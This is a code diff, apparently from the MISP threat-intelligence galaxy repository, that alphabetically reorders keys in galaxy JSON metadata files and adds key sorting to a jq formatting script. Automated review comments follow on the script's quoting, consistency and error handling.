diff --git a/galaxies/mitre-pre-attack-relationship.json b/galaxies/mitre-pre-attack-relationship.json
index 467a72a..1385b72 100644
--- a/galaxies/mitre-pre-attack-relationship.json
+++ b/galaxies/mitre-pre-attack-relationship.json
@@ -1,9 +1,9 @@
 {
- "uuid": "1f8e3bae-1708-11e8-8e97-4bd2150e5aae",
 "description": "Mitre Relationship",
- "version": 5,
 "icon": "link",
- "type": "mitre-pre-attack-relationship",
 "name": "Pre Attack - Relationship",
- "namespace": "mitre-attack"
+ "namespace": "mitre-attack",
+ "type": "mitre-pre-attack-relationship",
+ "uuid": "1f8e3bae-1708-11e8-8e97-4bd2150e5aae",
+ "version": 5
 }
diff --git a/galaxies/mitre-tool.json b/galaxies/mitre-tool.json
index 416ccf8..abd3132 100644
--- a/galaxies/mitre-tool.json
+++ b/galaxies/mitre-tool.json
@@ -1,9 +1,9 @@
 {
- "name": "Tool",
- "type": "mitre-tool",
 "description": "Name of ATT&CK software",
 "icon": "gavel",
- "version": 5,
+ "name": "Tool",
+ "namespace": "deprecated",
+ "type": "mitre-tool",
 "uuid": "d5cbd1a2-78f6-11e7-a833-7b9bccca9649",
- "namespace": "deprecated"
+ "version": 5
 }
diff --git a/galaxies/preventive-measure.json b/galaxies/preventive-measure.json
index ffb280b..7739089 100644
--- a/galaxies/preventive-measure.json
+++ b/galaxies/preventive-measure.json
@@ -1,9 +1,9 @@
 {
- "name": "Preventive Measure",
- "type": "preventive-measure",
 "description": "Preventive measures based on the ransomware document overview as published in https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml# . The preventive measures are quite generic and can fit any standard Windows infrastructure and their security measures.",
- "version": 3,
 "icon": "shield",
+ "name": "Preventive Measure",
+ "namespace": "misp",
+ "type": "preventive-measure",
 "uuid": "8168995b-adcd-4684-9e37-206c5771505a",
- "namespace": "misp"
+ "version": 3
 }
diff --git a/galaxies/ransomware.json b/galaxies/ransomware.json
index 90cdacd..8af5f41 100644
--- a/galaxies/ransomware.json
+++ b/galaxies/ransomware.json
@@ -1,9 +1,9 @@
 {
 "description": "Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml",
- "type": "ransomware",
- "version": 4,
- "name": "Ransomware",
 "icon": "btc",
+ "name": "Ransomware",
+ "namespace": "misp",
+ "type": "ransomware",
 "uuid": "3f44af2e-1480-4b6b-9aa8-f9bb21341078",
- "namespace": "misp"
+ "version": 4
 }
diff --git a/galaxies/rat.json b/galaxies/rat.json
index c30e986..a68c737 100644
--- a/galaxies/rat.json
+++ b/galaxies/rat.json
@@ -1,9 +1,9 @@
 {
- "type": "rat",
- "name": "RAT",
 "description": "remote administration tool or remote access tool (RAT), also called sometimes remote access trojan, is a piece of software or programming that allows a remote \"operator\" to control a system as if they have physical access to that system.",
- "version": 3,
 "icon": "eye",
+ "name": "RAT",
+ "namespace": "misp",
+ "type": "rat",
 "uuid": "06825db6-4797-11e7-ac4d-af25fdcdd299",
- "namespace": "misp"
+ "version": 3
 }
diff --git a/galaxies/sector.json b/galaxies/sector.json
index 6d002bd..045d08f 100644
--- a/galaxies/sector.json
+++ b/galaxies/sector.json
@@ -1,9 +1,9 @@
 {
- "type": "sector",
- "name": "Sector",
 "description": "Activity sectors",
- "version": 2,
 "icon": "industry",
+ "name": "Sector",
+ "namespace": "misp",
+ "type": "sector",
 "uuid": "e1bb134c-ae4d-11e7-8aa9-f78a37325439",
- "namespace": "misp"
+ "version": 2
 }
diff --git a/galaxies/stealer.json b/galaxies/stealer.json
index 8ab1c20..3da0cc5 100644
--- a/galaxies/stealer.json
+++ b/galaxies/stealer.json
@@ -1,9 +1,9 @@
 {
 "description": "Malware stealer galaxy.",
- "type": "stealer",
- "version": 1,
- "name": "Stealer",
 "icon": "key",
+ "name": "Stealer",
+ "namespace": "misp",
+ "type": "stealer",
 "uuid": "f2ef4033-9001-4427-a418-df8c48e6d054",
- "namespace": "misp"
+ "version": 1
 }
diff --git a/galaxies/tds.json b/galaxies/tds.json
index 799790c..0ca9913 100644
--- a/galaxies/tds.json
+++ b/galaxies/tds.json
@@ -1,9 +1,9 @@
 {
- "type": "tds",
- "name": "TDS",
 "description": "TDS is a list of Traffic Direction System used by adversaries",
- "version": 4,
 "icon": "cart-arrow-down",
+ "name": "TDS",
+ "namespace": "misp",
+ "type": "tds",
 "uuid": "1b9a7d8e-bd7a-11e6-a4a6-cec0c932ce01",
- "namespace": "misp"
+ "version": 4
 }
diff --git a/galaxies/threat-actor.json b/galaxies/threat-actor.json
index ae65bdb..c968479 100644
--- a/galaxies/threat-actor.json
+++ b/galaxies/threat-actor.json
@@ -1,9 +1,9 @@
 {
- "name": "Threat Actor",
- "type": "threat-actor",
 "description": "Threat actors are characteristics of malicious actors (or adversaries) representing a cyber attack threat including presumed intent and historically observed behaviour.",
- "version": 3,
 "icon": "user-secret",
+ "name": "Threat Actor",
+ "namespace": "misp",
+ "type": "threat-actor",
 "uuid": "698774c7-8022-42c4-917f-8d6e4f06ada3",
- "namespace": "misp"
+ "version": 3
 }
diff --git a/galaxies/tool.json b/galaxies/tool.json
index a5d0aee..41f90ae 100644
--- a/galaxies/tool.json
+++ b/galaxies/tool.json
@@ -1,9 +1,9 @@
 {
- "type": "tool",
- "name": "Tool",
 "description": "Threat actors tools is an enumeration of tools used by adversaries. The list includes malware but also common software regularly used by the adversaries.",
- "version": 3,
 "icon": "optin-monster",
+ "name": "Tool",
+ "namespace": "misp",
+ "type": "tool",
 "uuid": "9b8037f7-bc8f-4de1-a797-37266619bc0b",
- "namespace": "misp"
+ "version": 3
 }
diff --git a/jq_all_the_things.sh b/jq_all_the_things.sh
index 2d9cc62..6fc3099 100755
--- a/jq_all_the_things.sh
+++ b/jq_all_the_things.sh
@@ -6,6 +6,7 @@ for dir in `find . -name "*.json"` do echo validating ${dir} + # python3 -c "import json; f_in = open('${dir}'); data = json.load(f_in); f_in.close(); f_out = open('${dir}', 'w'); json.dump(data, f_out, indent=2, sort_keys=True, ensure_ascii=False); f_out.close();" cat ${dir} | jq . >/dev/null rc=$? if [[ $rc != 0 ]]; then exit $rc; fi
@@ -17,13 +18,13 @@ set -x for dir in clusters/*.json do # Beautify it - cat ${dir} | jq . | sponge ${dir} + cat ${dir} | jq --sort-keys . | sponge ${dir} done for dir in galaxies/*.json do # Beautify it - cat ${dir} | jq . | sponge ${dir} + cat ${dir} | jq --sort-keys . | sponge ${dir} done cat schema_clusters.json | jq . | sponge schema_clusters.json
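Review bot: The line added to the validation loop in the first hunk of jq_all_the_things.sh is a commented-out python3 one-liner, not documentation, and it sits inside a loop whose `for dir in` header is outside the hunk. As written it interpolates `${dir}` straight into a Python source string, so if anyone re-enables it, a path containing a quote character breaks the Python syntax rather than being handled; a commented-out command also tends to be re-enabled without that being noticed. If the intent is to record that a pure-Python canonicaliser was considered as an alternative to `jq --sort-keys`, replace the dead command with a plain comment such as `# the python json module (indent=2, sort_keys=True, ensure_ascii=False) gives equivalent output if jq is unavailable`; otherwise drop the line.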
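Review bot: In the second hunk `--sort-keys` is added to the two beautify loops, but the final `cat schema_clusters.json | jq . | sponge schema_clusters.json` line is left on plain `jq .`, so the schema is the one JSON file the script does not key-sort. If that is deliberate (schema key order can aid reading), a comment on that line would stop the next contributor from "fixing" it; otherwise `cat schema_clusters.json | jq --sort-keys . | sponge schema_clusters.json` keeps the three steps consistent. Separately, each `jq … | sponge ${dir}` pipeline writes whatever jq emitted back over the file regardless of jq's exit status, so if jq fails part-way the cluster or galaxy file is truncated; only the validation loop earlier in the script guards against that, and the beautify loops would be safer on their own with `set -o pipefail` (the script already uses `set -x`) or an explicit `|| exit` on the pipeline.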